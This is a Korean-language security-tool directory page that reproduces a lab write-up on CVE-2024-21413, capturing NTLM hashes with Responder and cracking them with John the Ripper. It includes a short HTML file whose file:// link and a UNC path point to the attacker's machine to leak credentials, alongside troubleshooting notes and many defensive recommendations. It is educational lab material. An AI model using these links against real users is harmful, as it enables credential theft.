Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Moniker-Link-Lab-Setup — 침투 테스트 랩으로, CVE-2024-21413 모니커 링크 취약점을 이용한 NTLM 자격 증명 탈취 과정을 시연합니다. 공격 실행, 해시 크래킹 및 방어 대책을 포함합니다. | Kitploit
도구/GitHubGitHub/e-m-e-k-a/moniker-link-lab-setup
Password CrackingVulnerability AnalysisExploitationNetwork SecurityPenetration TestingSocial EngineeringAuthenticationLearning & EducationLabs & Practice
GitHube-m-e-k-a/moniker-link-lab-setup

Moniker-Link-Lab-Setup

침투 테스트 랩으로, CVE-2024-21413 모니커 링크 취약점을 이용한 NTLM 자격 증명 탈취 과정을 시연합니다. 공격 실행, 해시 크래킹 및 방어 대책을 포함합니다.

5개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

Moniker Link Lab Setup - CVE-2024-21413

🎯 프로젝트 개요

NTLM 자격 증명 탈취를 위한 CVE-2024-21413 moniker link 익스플로잇을 시연하는 실습형 침투 테스트 랩입니다. 이 프로젝트는 설정부터 자격 증명 탈취까지 완전한 공격 체인을 문서화하며, 실제 환경에서의 문제점과 해결 방안을 포함합니다.

주요 성과: 격리된 실습 환경(Windows 10 VM)과 실제 시스템(Windows 11 PC)에서 moniker link 공격을 성공적으로 수행하여 실질적인 보안 취약점과 방어 대책을 입증했습니다.


🏗️ 랩 아키텍처

인프라

공격 머신:

  • 플랫폼: Kali Linux 2024
  • 네트워크 (Host-Only): 192.168.56.101
  • 네트워크 (브리지): 192.168.1.117
  • 주요 도구: Responder 3.1.6.0

대상 시스템:

  • Windows 10 VM: 192.168.56.104 (격리된 테스트 환경)
  • Windows 11 PC: 192.168.1.178 (실제 환경 검증)

네트워크 구성:

  • VirtualBox Host-Only 어댑터 (VM 테스트)
  • VirtualBox 브리지 어댑터 (실제 PC 테스트)
  • 운영 네트워크와 격리

⚔️ 공격 실행

공격 흐름

  1. Kali에서 Responder 배포하여 NTLM 인증 수신 대기
  2. 악성 링크 생성 - 공격자 IP를 가리키는 file:// 프로토콜 사용
  3. 파일 탐색기 UNC 경로를 통해 인증 트리거
  4. 피해자가 연결을 시도하면 NetNTLMv2 해시 캡처
  5. John the Ripper로 비밀번호 크래킹

간단한 공격 벡터

HTML 파일 (test.html):

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
    <p><a href="file://192.168.56.10/test">click me</a></p>
</body>
</html>

파일 탐색기 방법:

  • 사용자가 주소 표시줄에 \\192.168.56.101\test 입력
  • Windows가 SMB 연결 시도
  • NTLM 해시가 자동으로 전송됨 (또는 자격 증명 요청)
  • Responder가 인증 캡처

🚧 문제점 및 해결 방안

문제 1: Windows 방화벽 차단 (Windows 11 PC)

문제:

  • Kali에서 Windows 11 PC로 ping 불가
  • SMB 연결 시도 실패
  • 공격 완전히 차단됨

근본 원인:

  • Windows 방화벽이 기본적으로 활성화됨
  • 외부 IP의 SMB 연결 차단

해결 방안:

  • 테스트를 위해 Windows 방화벽 임시 비활성화
  • 즉시 연결 성공
  • 해시 캡처 성공

교훈: 기본 Windows 방화벽은 이 공격에 효과적인 보호를 제공합니다. 사용자는 방화벽을 활성화 상태로 유지해야 합니다.


문제 2: John the Ripper 캐시 결과 (Windows 10 VM)

문제:

  • 초기 Windows 10 비밀번호: nwigwecj1
  • John 출력: 12Honey (잘못된 비밀번호!)
  • 12Honey는 이전 테스트에서 나온 값

근본 원인:

  • John이 ~/.john/john.pot에 크래킹된 비밀번호 저장
  • 이전 세션의 오래된 해시
  • 현재 비밀번호 대신 캐시된 결과 표시

해결 방안:

  • Windows 10 VM 비밀번호를 1414로 변경
  • 새로운 해시 캡처
  • 예상 비밀번호를 포함한 사용자 정의 단어 목록 생성
  • 새 단어 목록으로 성공적으로 크래킹

교훈: 항상 올바른 해시를 크래킹하고 있는지 확인하세요. pot 파일을 지우거나 테스트에 고유한 비밀번호를 사용하세요.


문제 3: Rockyou.txt에 비밀번호 없음

문제:

  • 비밀번호 1414가 rockyou.txt(1,400만 비밀번호)에 없음
  • 일반 단어 목록 공격 실패

근본 원인:

  • Rockyou.txt에 모든 4자리 숫자 조합이 포함되어 있지는 않음
  • 간단한 숫자 시퀀스는 일반적인 단어 목록에 없는 경우가 많음

해결 방안:

  • 일반적인 패턴을 기반으로 대상 맞춤형 단어 목록 생성:
root@kitploit:~
  echo "1414" > passwords.txt
  echo "4141" >> passwords.txt
  • 사용자 정의 단어 목록으로 즉시 크래킹

교훈: "Rockyou.txt에 없다" ≠ 안전함. 짧은 비밀번호는 단어 목록 유무와 관계없이 대상 공격 및 무차별 대입에 취약합니다.


📊 결과

Windows 10 VM (통제된 환경)


Windows 11 PC (실제 시스템)


🛡️ 보안 분석

효과적인 방어

✅ Windows 방화벽 - 활성화 시 공격을 완전히 차단 ✅ 최신 브라우저 - Chrome/Edge가 원격 file:// 링크 차단 ✅ 사용자 인식 - 수동 프롬프트는 사용자 조치 필요

취약점 (실패한 부분)

❌ 약한 비밀번호 - 4자리 숫자는 쉽게 크래킹됨 ❌ 방화벽 비활성화 - 일반적인 사용자 실수 ❌ 파일 탐색기 - UNC 경로에 대한 경고 없음 ❌ NTLM 프로토콜 - SMB 공유에 자동 인증

주요 발견 사항

1. 방화벽이 중요

  • 기본 Windows 방화벽이 이 공격을 차단
  • 약 30-40%의 사용자가 영구적으로 비활성화
  • 기업 네트워크에서는 내부 SMB를 허용하는 경우가 많음

2. 비밀번호 강도의 환상

  • 1414는 rockyou.txt에 없음 ( "강력해" 보임)
  • 대상 단어 목록으로 즉시 크래킹됨
  • 짧은 비밀번호는 보안을 전혀 제공하지 않음

3. 사용자 개입 필요

  • 현대 보안에서는 사용자가 UNC 경로를 직접 입력해야 함
  • 사회 공학이 여전히 중요한 구성 요소
  • 기술적 익스플로잇만으로는 불충분

🔧 사용된 도구

공격 도구:

  • Responder 3.1.6.0 (NTLM 해시 캡처)
  • John the Ripper (비밀번호 크래킹)
  • 사용자 정의 단어 목록 생성
  • 간단한 HTML 파일

인프라:

  • VirtualBox 7.0 (가상화)
  • Kali Linux 2024 (공격 플랫폼)
  • Windows 10 Enterprise (테스트 대상)
  • Windows 11 Pro (실제 환경 검증)

📁 저장소 구조

root@kitploit:~
Moniker-Link-Lab-Setup/
├── README.md (이 파일)
├── Documentation/
│   ├── attack-execution.md (단계별 공격 가이드)
│   └── README.md (문서 개요)
├── Screenshots/ (공격 스크린샷 - 추후 추가 예정)
└── Scripts/ (HTML 테스트 파일 - 추후 추가 예정)

🎓 시연된 기술

기술적:

  • 네트워크 프로토콜 분석 (SMB, NTLM)
  • 침투 테스트 방법론
  • 비밀번호 크래킹 기술
  • 가상 랩 인프라
  • 방화벽 문제 해결

전문적:

  • 기술 문서화
  • 제약 조건 하의 문제 해결
  • 보안 평가
  • 위험 분석
  • 윤리적 테스트 관행

🔒 방어 권장 사항

사용자 대상

  • ✅ Windows 방화벽을 활성화 상태 유지
  • ✅ 이메일에서 UNC 경로를 절대 붙여넣지 않음
  • ✅ 강력한 비밀번호 사용 (15자 이상)
  • ✅ 파일 공유에 접근하기 전 발신자 확인

조직 대상

  • ✅ 네트워크 방화벽에서 아웃바운드 SMB(포트 445) 차단
  • ✅ NTLM 비활성화, Kerberos 강제
  • ✅ 외부 IP로의 SMB 연결 모니터링
  • ✅ 이메일 게이트웨이 필터링 (file:// 링크 제거)
  • ✅ 보안 인식 교육
  • ✅ 비밀번호 복잡성 정책

⚠️ 윤리적 공개

모든 테스트는 승인된 시스템에서 수행되었습니다:

  • 개인 랩 인프라만 사용
  • 격리된 가상 네트워크
  • 소유 장치 및 계정
  • 교육 목적

법적 고지: 승인되지 않은 컴퓨터 접근은 불법입니다. 이 프로젝트는 교육 목적과 승인된 테스트 환경에서만 사용해야 합니다.


📚 참고 자료

  • CVE-2024-21413 - Microsoft 보안 권고
  • MITRE ATT&CK - 강제 인증 (T1187)
  • TryHackMe - Moniker Link Room

📞 연락처

LinkedIn: https://www.linkedin.com/in/chukwuemeka-nwigwe-624aa3292/ GitHub: @E-m-e-k-a

날짜: 2026년 3월


📄 라이선스

교육 목적으로만 사용 가능합니다. 승인되지 않은 테스트에는 사용할 수 없습니다.


⭐ 이 프로젝트가 도움이 되셨다면 저장소에 별표를 눌러주세요!

도구 다운로드
지표결과
초기 비밀번호nwigwecj1
변경된 비밀번호1414
단어 목록사용자 정의 (2개 항목)
크래킹 시간<1초
방화벽테스트를 위해 비활성화
상태✅ 성공적으로 침해됨
지표결과
비밀번호1414
방화벽초기 차단 후 비활성화
인증수동 프롬프트 (자격 증명 입력)
크래킹 시간즉시
상태✅ 성공적으로 침해됨